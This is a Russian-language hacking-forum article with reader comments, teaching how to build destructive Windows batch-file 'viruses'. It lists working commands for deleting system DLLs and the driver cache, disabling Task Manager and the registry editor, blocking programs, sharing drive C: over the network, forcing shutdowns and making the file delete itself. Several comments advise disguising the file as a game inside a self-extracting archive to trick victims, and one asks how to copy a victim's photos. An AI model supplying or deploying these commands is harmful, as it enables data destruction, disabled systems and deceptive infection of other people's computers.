BAT - вирусы — HackZona.Ru

BAT - вирусы

BAT - вирусы

Тип статьи:
Со старой ХакЗоны.
Источник:
Создание ВАТ-вирусов

В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто batников, для этого нам понадобится всего лишь стандартный Блокнот Windows. Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul Запретить комбинацию клавиш Ctrl-Alt-Del

del "%SystemRoot%system32*.dll" /q >nul Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul Удалить все драйверы, установленные на компьютере

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul Поменять местами значения кнопок мыши

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul Делает невозможным запуск приложений

time 0:00 >nul Поставить время на 00:00

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul Запретить редактирование реестра вручную

del "%SystemRoot%Cursors*.*" >nul Удалить курсор мыши

del "%SystemRoot%Media" /q >nul Удалить системные звуки Windows

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul Убрать рабочий стол

shutdown -r -t 1 -c «lol» -f >nul Форсираванная перезагрузка ПК

shutdown -s -t 1 -c «lol» -f >nul Форсированное выключение ПК

taskkill /f /im explorer.exe >nul Убить процесс Explorer.exe

net share «ResName»=«C:» >nul Расшарить диск C:

label C: Диск >nul Переименовать диск С:

msg * «Текст сообщения» >nul Показать Windows-стилизованное сообщение с кнопкой ОК

del "%0" >nul Самоликвидация вируса

А теперь комментарии. Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0. Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение. Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c «lol», то произойдёт перезагрузка, а если -s -t 1 -c «lol», то выключение. Также можно добавить в конце f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя. Команда
taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением. Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью. Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название. Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды. Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat
Также вы можете писать подобные вирусы не вручную, а используя специальные программы, автоматизирующие данный процесс. Могу порекомендовать одну такую программу, это BAT Virus Master. Спасибо за внимание, всех благ:)
Нравится
Не нравится

35 комментариев

08:07
Я тут новичок и хочу узнать. А как мне писать полный путь к файлу( если он лежит на диске D и его название :текстовый документ.txt ). Я пробовал, не получается его удалить. И как понять - вирус самоликвидируется?
00:07
Спасибо! Давно увлекся BAT вирусами!
23:35
Если понравилась эта статья, то я ещё напишу на тему разработки вредоносного ПО
01:33
кулл!! ваще супер!
02:58
КЛАС!!! Напиши ещё про вредоносное ПО!!!! С удовольствием почитаю, а самое главное попробую)))
14:14
OG-Bass лучше напиши как через термминал ftp отправить папку на свой ftp )))))
Hai
14:46
ВАТ вирус это хорошо а вот вирус созданным DELPHI еще лучше!!!
19:30
спасибо автору отлично написано
18:32
а как активировать вирус?
21:21
Файл *.bat является командным файлом и выполняет свои функции при запуске. Если цель впарить кому-нибудь его, то лучше юзать SFX-архив, и настроить его чтобы он после распаковки вируса (который можно выдать за что угодно) сразу же его запускал.
11:57
Ну это хорошо, скажем, если друг-ламер в игрушки порезаться решил, тогда надо принести тупо инсталированную папку с игрой, где создан бат-вирус с иконкой игры, а файлу запуска игры дать иконку типа документа MS-DOS или файла конфигурации. Тока надо дописать, чтоб батник игру врубал!
11:16
Тоже вариант=)
19:17
блин у мя он не сохраняется а *.bat
18:27
Clot, может ты плохо сохраняешь? Файл => Сохранить как => в названнии файла пишешь, к примеру virus.bat => жми сохранить. После этих манипуляций в директории будет два файла virus.txt и virus.bat. Кстати, а может в "Сохранить как" была указана по-умолчанию иная директория, нежели та, в которой был исхотный *.txt, а bat'ник создался но ты просто не знаешь в какой директории.
20:24
люди, подскажите. Nul - значение 0. А обратное значение какое ? Ну, т.е. 1 - это One?
Просто если надо будет "лечилку написать", то вместо нулл, как я понял, надо будет вводить обратное значение? Что надо вместо nul писать?
23:17
Чего-чего, а лечилок я не делал не разу( попробуй все варианты.
04:57
хорошаяя статейка, много прочёл про батники, да и сделал их много... а вот например команду
"net share "ResName"="C:" >nul Расшарить диск C:"
не знал... уважуха автору
14:53
Спасибо, для вас старался!)
17:52
Батники сильно палятся!!! У меня есть эта прога "BAT Virus Master"- в этой проге очень мало команд..
www.hackersoft.ru на этом сайте есть все кульные проги..
00:36
спасибо!!! Афигенный сайт, огромный Респектос вам, прикольно написал >>> "В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только." штандартные рулят)))
21:03
вот єто кууууууууууууль))))САЙТ РУЛЁС!)
12:24
Bizarro ты два раза кликни или засунь в папку авто запуска, вот так и активируешь, посмотришь как оно работает whahahah
17:56
Подскажите как сделать чтобы батник копировал все фотки с компа и сохранял их в папке например на флешке.
17:56
Подскажите как сделать чтобы батник копировал все фотки с компа и сохранял их в папке например на флешке.
12:30
Админ, спасибо огромное зи информацию!) Очень редко когда ктото из тех, которые обладают драгоценными знаниями о компьютерах, соглашаются поделиться ими со всеми))) Афигеть сайт)
00:18
Бесполезная статья...подобных миллиарды, если б что-то новое а то всё старое в новом оформлении....
08:25
MAXIMUS49, точно также, через команду del. Самоликвидация используется в том случае, если необходимо стереть следы присутствия вредоносной программы, т.е. по этой команде твой ВАТник сам себя удаляет.
19:55
а есть такая команда в батнике или vbs чтоб запретить кому нибудь вход на определённый сайт в интернете?
13:21
GuieL, ну допустим далеко не миллиарды. К тому же на данном ресурсе я не наблюдал развёрнутых статей на эту тему, поэтому и решил написать. Эксклюзив, так сказать, для хакзоны=)
11:34
Статья взята с http://lamhack.ucoz.kz/publ/bat_virusy/4-1-0-126
18:34
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul Запретить комбинацию клавиш Ctrl-Alt-Del

я новенький на этом сайте.у меня на компе походу стаит Запрет комбинаций клавиш Ctrl-Alt-Del как его убрать есть анти?
22:12
я создал msg * "Текст сообщения" >nul работает тогда открываешь ват файл,а можно ли когда комп включается тогда появится этот тект? и добавил туда del "%0" >nu ,не удалился файл,плз помочь
14:20
Есть такая команда
@echo off
echo -- >> %windir%system32driversetchosts
echo 127.0.0.1 (адрес сайта без www) >> %windir%system32driversetchosts
20:55
Cтатья очень полезная.Особенно помню на информатике вместо аськи сделал батник чтобы комп перезагружался и сообщение "НЕЛЬЗЯ ТУДА"
10:08
Sector_7

Статью писал полностью сам, ни грамма копипаста. Скорее она была скопирована отсюда, т.к. нигде, помимо хакзоны я её не размещал.